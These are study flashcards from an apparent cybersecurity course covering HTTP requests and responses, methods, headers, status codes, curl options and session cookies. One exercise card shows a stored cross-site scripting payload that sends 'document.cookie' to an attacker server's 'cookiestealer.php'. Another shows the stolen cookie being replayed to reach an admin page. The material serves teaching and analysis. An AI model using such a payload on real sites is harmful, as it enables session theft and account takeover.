14.1 HTTP with Session and Cookies Flashcards
Securing the web requires in-depth knowledge of what topics? (4)
- Client-server architecture
- HyperText Transfer Protocol (HTTP)
- HTTP requests
- HTTP responses
The client-server model is an exchange of information, a cycle of _______ and _______ between ______ and ________.
The client-server model is an exchange of information, a cycle of requests and responses between clients and servers.
Clients and servers use the _______ to communicate on the web.
Clients and servers use the HTTP protocol to communicate on the web.
HTTP is what layer of OSI model?
Layer 7 Application
HTTP is used to transfer web pages, static assets such as images and HTML/markup files, and raw data, such as MP4 video or MP3 audio.
There are various types of requests, known as ________, which indicate the specific actions between the client and server.
There are various types of requests, known as HTTP methods, which indicate the specific actions between the client and server.
What are the three main various HTTP methods?
- A user requests data from a server:
Ex. I’d like to see my friend’s photos on Facebook.
- A user gives data to a server:
Ex. Here are my credentials for my LinkedIn account.
- A user updates data already existing on a server:
Ex. Two new accounts have been added to the employee directory database.
What are all the various HTTP methods? (6)
- GET - Requests data from a server.
- POST - Sends data to a source, often changing or updating a server.
- PUT - Replaces current data with the new value.
- DELETE - Deletes a specified resource.
- CONNECT - Establishes a tunnel to the server.
- OPTIONS - Lists the communication options for target resource.
What is an example of a GET request?
When you open a browser and go to amazon.com, the HTTP client (your browser) asks to GET the data that the URL (amazon.com) points to. That data is the webpage.
What is an example of a POST request?
Once your browser goes to amazon.com, you need to log into your Amazon account. The client sends a POST request that contains your credentials for logging in.
What’s the whitespace mean in a request?
Whitespace is a blank line indicating the end of the request.
______ is a command-line client that allows us to send data to and from servers. This allows security professionals to:(4)
curl
- Test web server security configurations.
- Ensure web servers don’t leak sensitive data through their HTTP responses.
- Verify that servers only respond to certain types of requests.
- Look for vulnerabilities on a web server.
HTTP resources are inherently ________, meaning that when your browser requests a web page, the webpage can’t distinguish you from others.
stateless
True or Flase: Websites need a way to deliver content that is specific to each user. To do so, they establish sessions with cookies.
True Cookies are small pieces of text data that, when sent by an HTTP server’s response header, are saved by the user’s HTTP client.
HTTP requests are sent from an ______ to an ______
HTTP requests are sent from an HTTP client to an HTTP server
_______ are sent back from the ________ as a response to the client
HTTP responses are sent back from the HTTP servers as a response to the client
HTTP requests include: (3)
- Request line
- Request header
- Optional request body
HTTP responses include: (3)
- Status line
- Response header
- Usually a response body
Explain query parameters:
Query parameters allow you to be specific about the parts of a resource you want to send or receive data from.
Explain the PUT method:
PUT requests also send data to an HTTP server, but are often used to overwrite resources, such as updating a part of a webpage.
Explain the DELETE method
The DELETE method deletes the specified resource from the server
Explain the CONNECT method:
The CONNECT method establishes a tunnel to the server.
Explain the OPTIONS method:
OPTIONS requests ask an HTTP server to respond with all HTTP methods that the HTTP server is programmed to respond to.
Explain what an HTTP request looks like:
A **request line** contains the request method, the name of the requested resource, and the version of HTTP in use.
- The request line can also contain **query parameters**, which the client can use to send data to the server.
**Headers** contain additional details about the requested resource. They are used to implement many actions with security implications, such as authentication and remembering user resources.
- There are many different types of headers, and you aren’t expected to remember them all.
- We’ll see the most common headers as we continue to explore requests and responses. Links to reference documentation will be provided, which you can use for their own research later.
**Whitespace** is a blank line indicating the end of the request.
Once the server receives the request, explain what it returns:
A **status line** contains the response status code and translation, such as OK or Conflict.
**Headers** contain additional information about the response, similar to response headers.
-Whitespace (a blank line) separates the header from the response body that follows.
A **response body** contains the resource requested by the client, all of the web code and styling that your browser uses to format the page.
Breakdown this request line:
GET /js/analytics.js HTTP/1.1
GET: The request method.
/js/analytics.js: The requested resource. This resource is the file path from a domain stated in the header (Host).
HTTP version 1.1: The protocol version used by the browser.
Breakdown this header section (part 1):
Host: www.target-server.com
Connection: keep-alive
Host: www.target-server.com: Contains the domain name of the target server.
Connection: keep-alive: Tells the server to keep the TCP connection used for this HTTP transfer open after sending the response.
- This allows the client-server to reuse the TCP connection for later HTTP requests.
- The alternative is performing a TCP handshake: opening a connection, transferring the request and response, closing the connection, and repeating for each request response cycle.
- Since HTTP usually involves a series of requests and responses, this would result in slower transfers than simply reusing the connection.
Breakdown this header section (part 2):
Upgrade-Insecure-Request: 1
Accept: text/js, text/html. */*
Accept-Language: en-us
Accept-Encoding: qzip, deflate
User-Agent: Mozilla/4.0
Upgrade-Insecure-Requests: 1: Tells the server to turn this HTTP connection into HTTPS, which will encrypt the response and all further communications.
-
Accept: text/html/, text/js, */*: Tells the server that the client expects to receive a JavaScript or HTML document in response (
text/html, text/js), but will accept data of any type (*/*).
User-Agent: Mozilla/4.0: Tells the server that this request is coming from a Mozilla 4.0 browser.
What are some of the common request headers? (3)
**Authorization**: Contains the credentials used to authenticate a user with a server.
**Referer**: Contains the address of the previous webpage from which the currently requested page was linked. This header allows servers to identify where people are visiting from, and may use that data for analytics, logging, or optimized caching.
- If a link from a Google search led to the current page, the referrer is Google.
**Cookie**: Contains stored HTTP cookies previously sent by the server with the **Set-Cookie** response header.
GET requests can also request data with ________.
GET requests can also request data with query parameters.
Query parameters are useful for specifying which parts of a resource to receive or send data to
The general syntax for query parameters is:
[path]?[firstParam]=[value]&[secondParam]=[value]
There is no limit to the number of query parameters a user can send using GET requests.
POST requests are used to __________.
POST requests are used to send data to a server.
POST requests send data to an HTTP server’s resources, such as login credentials or images for a webpage.
The structure of an HTTP POST request is similar to a GET request, but includes a _______ below the whitespace.
**request body**
The request body may contain information such as login credentials or a file to be uploaded. In the current example, our request body contains login credentials
Breakdown the status line in the following HTTP request:
HTTP/1.1: The unencrypted protocol is in use.
200 OK: Status code showing that the request was processed properly.
Breakdown the response headers in the following HTTP request:
Date: Contains a timestamp of when the response was generated.
Server: Apache/2.4.7 (Ubuntu): Indicates the server is running Apache 2.4.7 on Ubuntu.
X-Powered-By: PHP/5.5.9-lubuntu4.21: Indicates the server is running PHP version 5.5.9 on Lubuntu with kernel version 4.21.
Set-Cookie: SESSID=8toks; httponly: Tells the client to create a cookie called SESSID with the value 8toks, and that this cookie can only be set by the server with HTTP. We’ll discuss cookies and httponly in greater detail later.
Below the whitespace is the response body, which contains the source code of the resource requested in the GET request.
What do the following status codes mean?
- 200
- 300
- 400 & 404
- 500
200 - codes indicate success.
300 - codes indicate multiple choices, meaning the server can respond to the request in more than one way.
- *400 -** codes indicate client errors, meaning the client sent an improperly formatted request.
- 404 - is a common example of a 400 code, indicating that a webpage doesn’t exist or can’t be accessed.
500 - codes indicate server errors, meaning the server application failed somehow.
What kind of request was used here that would cause an HTTP server to tell the client all of the HTTP request methods it will respond to?
**HTTP Response 1**
HTTP HTTP/1.1 200 OK Date: Tue, 25 Sep 2018 21:21:20 GMT Server: Apache/2.2.21 (Unix mod\_ssl/2.2.21 OpenSSL/1.0.0k DAV/2 PHP/5.4.3) WWW-Authenticate: Cookie realm="fakesite" Allow: OPTIONS, GET, POST, HEAD, PUT
They used the OPTIONS method here. This was the attacker’s reconnaissance phase, where they found out all available HTTP methods that can be requested to the HTTP server.
The OPTIONS method is useful for an attacker to find out what kind of request methods they can leverage while attempting to compromise an HTTP server.
What status code was returned in this response? What kind of method was used to generate this HTTP response? What sort of information was input to this HTTP request? What did the attacker try to do? Were they successful?
```HTTP
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Cookie realm=”fakesite”
form-action=”/login”
cookie-name=AUTH-COOKIE
Content-Type: text/html
<title>Unauthorized</title>
<form>
<br></br> <input></input><br></br> <p><label>Username: <input></input></label><br></br> </p>
<p><label>Password: <input></input></label><br></br> </p>
<p><button>Sign in</button><br></br> </p>
<p><a>Register for an account</a><br></br> </p>
</form>
```
401
While we don’t see the request, we can tell the attacker attempted to log into the login portal with a POST request.
The response body shows a username and password being entered into the web page. The response error status code 401 indicates an invalid authorization attempt.
While we can’t see the request, we can tell the attacker attempted to log into the login portal with a POST request. The response body shows a username and password being entered into the webpage while the response error status code 401 indicates an invalid authorization attempt.
What type of method was used in the request? What file name was uploaded to the site, according to the request body? Based on the request method and request body, what do you think happened here?
**HTTP Request 1**
```HTTP
PUT /XSS.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.fakesite.com/blog
<script> <br/> document.location='http://133.7.13.37/cookiestealer.php?c='+document.cookie;<br/> </script>
```
**HTTP Response 3**
HTTP HTTP/1.1 201 Created Date: Mon, 05 May 2014 12:28:53 GMT Server: Apache/2.2.14 (Win32) Content-type: text/html Content-length: 30 Connection: Closed
The attacker used the PUT method.
cookiestealer.php
The attacker could not inject XSS code without uploading a file with it and used the PUT method to upload a cross-site script to steal the cookies of users and send the cookies to their own server.
Is there anything interesting about the URL requested?
**HTTP Response 4**
HTTP GET https://www.fakesite.com/admin HTTP/1.1 Cookie: $Version="1"; AUTH-COOKIE="sdf354s5c1s8e1s"; $Path="/admin"
Looking at HTTP Request 4, it’s clear that the attacker stole a cookie and was able to log into the admin portal using a GET request with stolen cookies set in the header
What is the most basic type of curl request and why would you need to use it?
curl https://somedomain.com
For example, when working through a container that
has no user interface, you’ll need a command-line tool to
send and receive HTTP requests.
Running curl with the –head flag will only show ________ the response header.
Breakdown the follwoing response:
Ex. curl –head https://posthere.io
console HTTP/1.1 200 OK Server: nginx/1.9.2 Date: Thu, 12 Mar 2020 06:02:20 GMT Content-Type: text/html Content-Length: 12905 Last-Modified: Wed, 01 Jan 2020 17:09:18 GMT Connection: close ETag: "5e0cd23e-3269" Accept-Ranges: bytes
Running curl with the –head flag will only show the response header.
- The Content-Type response header (text/html) tells our client (curl) that it is receiving a response body with the resource type HTML. This header serves the same purpose as a file name extension in your operating system.
- The Server response header tells our browser it is connecting to an nginx web server, one of the most popular HTTP servers.
Unlike a regular GET request, which returns the entire response body, POST requests need to __________________.
Unlike a regular GET request, which returns the entire response body, POST requests need to specify *where* you want to send information to.
Breakdown this POST Request with Query Parameters:
curl -X POST https://posthere.io/f260-48d9-8e1b
-X: Indicates that we are using a method other than the default GET.
POST: The method we are using.
https://posthere.io/f260-48d9-8e1b: Our unique URL that the page gave us. Everyone who uses the site is given a different URL.
Breakdown this POST Request with Plain Data:
curl -X POST -d “test data” [URL]
curl: The tool we are using.
-X: Indicates that we are using a different method than the default GET.
POST: The method we are using.
-d: Sends the data in a POST request to the server.
“test data”: The message we are sending.
https://posthere.io/f260-48d9-8e1b: The unique URL that the page gave us.
How would you create a POST request to upload structured JSON data?
curl -X POST -d “{"jsonKey1": "jsonValue1", "jsonKey2": "jsonValue2"}” -H “Content-Type: application/json” [Your URL]
- This command tells the server that we are sending it JSON data with the -H option, followed by “Content-Type: application/json”
HTTP resources are inherently ______, meaning that whenever your browser requests a webpage, there is no way for that webpage to distinguish you from anyone else.
HTTP resources are inherently **stateless**, meaning that whenever your browser requests a webpage, there is no way for that webpage to distinguish you from anyone else.
Websites need a way to deliver content that is specific to each user. To do so, they establish ______, with ______.
Websites need a way to deliver content that is specific to each user. To do so, they establish **sessions**, with **cookies**.
Fill in the blanks:
- A ______ contains user-specific information that is saved in order to personalize an HTTP response.
- A ______ has information that uniquely identifies each session.
- The cookie is created by the HTTP server and sent to an HTTP client through a _______.
- When the HTTP server sends the client the cookie, it also sends back the __________.
- The ______ receives the cookie, saves it, and processes the personalized response body.
- On future requests to the HTTP server, the HTTP client will send the cookie back to the HTTP server so that a _______ and _______ can be received in return.
- A session contains user-specific information that is saved in order to personalize an HTTP response.
- A cookie has information that uniquely identifies each session.
- The cookie is created by the HTTP server and sent to an HTTP client through a response header.
- When the HTTP server sends the client the cookie, it also sends back the personalized response body.
- The HTTP client receives the cookie, saves it, and processes the personalized response body.
On future requests to the HTTP server, the HTTP client will send the cookie back to the HTTP server so that a personalized response body and cookie can be received in return.
What types of attacks are cookies vulnerable to?
It’s relatively difficult to reverse engineer the contents of unique session ID cookies created with modern implementations.
- However, these cookies are still vulnerable to attacks such as cross-site scripts or man-in-the-middle attacks, which we will cover in a later unit.
- Instead of an attacker needing to figure out how to create a cookie that looks like another user’s, they can simply steal it from them.
A cookie is used to implement a ______.
A cookie is used to implement a user’s session.
A client and server exchange cookies through _______.
A client and server exchange cookies through headers.
Clients save cookies ______.
Clients save cookies locally.
A client sends a cookie via the ______ , whereas a server sends a cookie via the _______.
A client sends a cookie via the Cookie header. A server sends a cookie via the Set-Cookie header
Bad implementations of cookies can be ______ or ______, and cookies with modern implementations can be ______.
Bad implementations of cookies can be spoofed or stolen, and cookies with modern implementations can be stolen.
Why is it important for cybersecurity professionals to know how to manage cookies with curl?
Web application security engineers need to repeatedly ensure cookies are both functional
and safe from tampering.
For example, you might need to request a cookie from a webpage and then test various HTTP responses using that cookie. Doing this over and over through the
browser is tedious, but can be automated with scripts.
The same concepts apply for penetration testers and hackers: curl will be used to quickly save a cookie in order to test various exploits.
For example, an HTTP server may be configured so that in order to POST data to specific pages, clients need cookies or authentication information set in their request headers that the server can verify.
What are the two options to allows users to look through headers, send data, and authenticate to servers, and also to save and send cookies?
We can use the option –cookie-jar to save the
cookies set in a response header to a text file.
We can use the option –cookie to specify a text file
where a cookie is saved in order to send a request with
the cookies embedded in the request header.
